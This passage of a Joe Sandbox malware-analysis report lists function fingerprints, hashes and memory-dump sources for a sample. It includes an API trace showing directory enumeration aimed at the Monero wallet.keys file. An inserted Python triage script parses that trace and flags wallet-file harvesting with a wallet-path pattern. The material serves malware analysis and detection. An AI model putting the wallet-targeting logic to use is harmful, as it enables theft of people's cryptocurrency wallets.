                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: !($v~_$z~_
                                        • API String ID: 0-4077138999
                                        • Opcode ID: b557b6124bbd5382e9eef85390224a63dde7f5ffc2d26d4e1992e4c2a7a42e75
                                        • Instruction ID: 0ea9ce734a851b36d99c8e720ab119a0c7f63bcff7aa9affb4c4eff990378368
                                        • Opcode Fuzzy Hash: b557b6124bbd5382e9eef85390224a63dde7f5ffc2d26d4e1992e4c2a7a42e75
                                        • Instruction Fuzzy Hash: 6F5125B390C205DFD3147E69DD846BABBE8EB54350F22192EEBCEE3600E1315940A792
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ,}}
                                        • API String ID: 0-2922230984
                                        • Opcode ID: 6cd6c39eeb50ffa9e5b2d0ed03b6ef16cd0d2197432c6caa98f8a46f51a1f28f
                                        • Instruction ID: e6c60cd28b756deb40b51862157e75621c3647a4dd04dd5fd20c529c6cd5367e
                                        • Opcode Fuzzy Hash: 6cd6c39eeb50ffa9e5b2d0ed03b6ef16cd0d2197432c6caa98f8a46f51a1f28f
                                        • Instruction Fuzzy Hash: AEB2F5F390C2049FE704AE29EC8567AFBE9EF94720F16493DEAC4C3744EA3558058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: a(s$iA2
                                        • API String ID: 0-3445831206
                                        • Opcode ID: 07c1ea00a0218e275095ea957a1a1923464d06fec298da156b5b74eb30df44a3
                                        • Instruction ID: 9fad95305a8b307171e641802e25a6b6dec11cde4d4ee0b07c378fc778c710e6
                                        • Opcode Fuzzy Hash: 07c1ea00a0218e275095ea957a1a1923464d06fec298da156b5b74eb30df44a3
                                        • Instruction Fuzzy Hash: 3C5109F361C3085FE308AA2DEC9573AB7D9DBD4720F26463DE694C3780ED7558018696
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A615B8,00A60D96), ref: 00A4F71E
                                        • StrCmpCA.SHLWAPI(?,00A615BC), ref: 00A4F76F
                                        • StrCmpCA.SHLWAPI(?,00A615C0), ref: 00A4F785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4FAB1
                                        • FindClose.KERNEL32(000000FF), ref: 00A4FAC3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 287d54da532f8c175ae5f7ae350c3433c37a2fea607e7de294792f38c7b8040f
                                        • Instruction ID: a462417113606a3e9f3343561dade0bdb99989108127edb309d1c19705bfce45
                                        • Opcode Fuzzy Hash: 287d54da532f8c175ae5f7ae350c3433c37a2fea607e7de294792f38c7b8040f
                                        • Instruction Fuzzy Hash: 7E118475A0411DABDB14EBA0DD559ED7378BF20301F4047A9A91A57092EF302B4ECB92
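The function fingerprinted above is the one an analyst would triage first: a FindFirstFileA/FindNextFileA/FindClose loop with two StrCmpCA checks per entry, and lstrcpy/lstrcat path building in its subcalls, one of which references the string \Monero\wallet.keys. The Python below is an added example, not part of the Joe Sandbox report or the sample's code. It parses API lines in the exact form the report prints them into structured records and applies a simple triage rule: a function whose call tree both enumerates a directory and carries a wallet-file string is flagged as wallet-file harvesting. The sample lines are copied from the listing above; the wallet-file pattern (the Monero path seen here plus wallet.dat, the Bitcoin Core wallet file name) and the verdict labels are my own choices. The two StrCmpCA calls are counted as per-entry name filters, but the report only shows the addresses of the compared strings, so the code assumes nothing about their contents.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the twelve API lines of the "APIs" block above, copied as the
# report prints them (subcall lines carry the address of the callee function).
SAMPLE_API_LINES = r"""
• Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
• Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
• Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
• Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
• Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
• Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
• Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A615B8,00A60D96), ref: 00A4F71E
• StrCmpCA.SHLWAPI(?,00A615BC), ref: 00A4F76F
• StrCmpCA.SHLWAPI(?,00A615C0), ref: 00A4F785
• FindNextFileA.KERNEL32(000000FF,?), ref: 00A4FAB1
• FindClose.KERNEL32(000000FF), ref: 00A4FAC3
"""

# One report line: optional subcall prefix, API.MODULE(args), ref: call-site address.
LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumed wallet-file pattern: the Monero path seen in this report plus wallet.dat
# (Bitcoin Core), added so the rule is not tied to a single string.
WALLET_PATH_RE = re.compile(r"\\Monero\\|wallet\.(?:keys|dat)", re.IGNORECASE)

ENUM_START = {"FindFirstFileA", "FindFirstFileW", "FindFirstFileExA", "FindFirstFileExW"}
ENUM_NEXT = {"FindNextFileA", "FindNextFileW"}
PATH_BUILDERS = {"lstrcpy", "lstrcpyA", "lstrcpyW", "lstrcat", "lstrcatA", "lstrcatW"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                # address of the call site
    caller: Optional[int]   # subcall function address, None when called directly


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn the report's API lines into ApiCall records; reject lines it cannot read."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        caller = int(m["caller"], 16) if m["caller"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), caller))
    return calls


def classify_function(calls: List[ApiCall]) -> dict:
    """Heuristic triage of one function's call tree (direct calls plus subcalls)."""
    apis = {c.api for c in calls}
    enumerates = bool(ENUM_START & apis) and bool(ENUM_NEXT & apis)
    builds_paths = bool(PATH_BUILDERS & apis)
    # StrCmp* calls between FindFirstFile and FindNextFile are per-entry name
    # filters; the report shows only addresses for the compared strings, so the
    # count is reported without guessing what they are.
    name_filters = sum(1 for c in calls if c.api.startswith("StrCmp"))
    wallet_strings = sorted({a for c in calls for a in c.args if WALLET_PATH_RE.search(a)})
    if enumerates and wallet_strings:
        verdict = "wallet-file-harvesting"
    elif enumerates:
        verdict = "directory-enumeration"
    else:
        verdict = "none"
    return {
        "enumerates_directory": enumerates,
        "builds_paths": builds_paths,
        "name_filters": name_filters,
        "wallet_strings": wallet_strings,
        "verdict": verdict,
    }


if __name__ == "__main__":
    result = classify_function(parse_api_listing(SAMPLE_API_LINES))
    for key, value in result.items():
        print(f"{key}: {value}")
```

The parser is strict on purpose: an unrecognised line raises rather than being skipped, so a change in the report's line format surfaces immediately instead of silently emptying the call list and producing a "none" verdict.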
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: u}|
                                        • API String ID: 0-2745768974
                                        • Opcode ID: 61bf4fe0559e233b213ef3f540da83ef8279005aff5fe1e52420c18e4e10b284
                                        • Instruction ID: 9402c5a121c14013cf7178ab539b76d3c54038c36275ce6861b7516cc8ed0dbf
                                        • Opcode Fuzzy Hash: 61bf4fe0559e233b213ef3f540da83ef8279005aff5fe1e52420c18e4e10b284
                                        • Instruction Fuzzy Hash: 4541D0B3B083005FF314AA7DDC99B3AB6D6DBC4320F2A853DAB94C7785F97948054686
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: !FW_
                                        • API String ID: 0-1140023747
                                        • Opcode ID: ac41cbc447c2d2196e7455f61c0f0a3e9dea8f0f989efbb44d220e2eb456659d
                                        • Instruction ID: f32bef3db2e44f1051d2c19dd7b44fa727ba015a0b1a2e55c465f54fb0c87042
                                        • Opcode Fuzzy Hash: ac41cbc447c2d2196e7455f61c0f0a3e9dea8f0f989efbb44d220e2eb456659d
                                        • Instruction Fuzzy Hash: 424188B3A083005BE3446E3EDC8837ABBD6EFC4320F1A803CDAC487745D93969458292
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c4484befffa106554ee197a12d7973bf7b316ca91270e2b79231356b787d8b9
                                        • Instruction ID: 711353f9a901797c897aabe6571a48236e637d583d844c5cdaf1d74379f99811
                                        • Opcode Fuzzy Hash: 8c4484befffa106554ee197a12d7973bf7b316ca91270e2b79231356b787d8b9
                                        • Instruction Fuzzy Hash: 75E1D4F3A082109FE304AF2DDC8576AFBE9EF94720F16892DEAC4D7744E63558448687
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a9153b81a51fd0484fff8306d7294c7d9efe1137d66161f846f45b1ed6cd167
                                        • Instruction ID: 24bd44828e8100ce0dcd8af96e818f00133a76052e8217f23002e1609cf9c0ed
                                        • Opcode Fuzzy Hash: 4a9153b81a51fd0484fff8306d7294c7d9efe1137d66161f846f45b1ed6cd167
                                        • Instruction Fuzzy Hash: C26148F3A092109FE3046A2DDC9537AB7DADB98324F2B463DDAD5D37C0E9756C008686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99fc03c0638eeb7d679bf88e926e44f2d516c79583c51f3ad960527fe7410d28
                                        • Instruction ID: 44dbd1abdc548a14db72583cd4650cea591e1c698f7cce3354a3481151d5826a
                                        • Opcode Fuzzy Hash: 99fc03c0638eeb7d679bf88e926e44f2d516c79583c51f3ad960527fe7410d28
                                        • Instruction Fuzzy Hash: 056125F3A183149FE3042E29DC857BABBD9EB54320F16463DDBC487784E976584487C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93c694cca2872a7b94310ebfce96859bd35b769be13677b5bcd1b5681bb366ec
                                        • Instruction ID: d2bf2c72f4f2930eea70c9770c7e1f4ee28ab6908c3b8bf96adbff844b5ae601
                                        • Opcode Fuzzy Hash: 93c694cca2872a7b94310ebfce96859bd35b769be13677b5bcd1b5681bb366ec
                                        • Instruction Fuzzy Hash: 27514BB3A182195FF308AE2DEC41B76B7D9EB84321F1A453DEA84C7784E9355C0186CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f08371af12ffa20327b955e8c35cf763c485f360f87b4f480567c4a88087d54
                                        • Instruction ID: 07eaea956dd5c82bd17557d9a79f1378ac3c03759e73b29a3a55e4de70e24fa8
                                        • Opcode Fuzzy Hash: 2f08371af12ffa20327b955e8c35cf763c485f360f87b4f480567c4a88087d54
                                        • Instruction Fuzzy Hash: 8D5122F390C610DBD3096A28DC456FBB7E5EF94310F26453EEAC667204EA79180197C3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
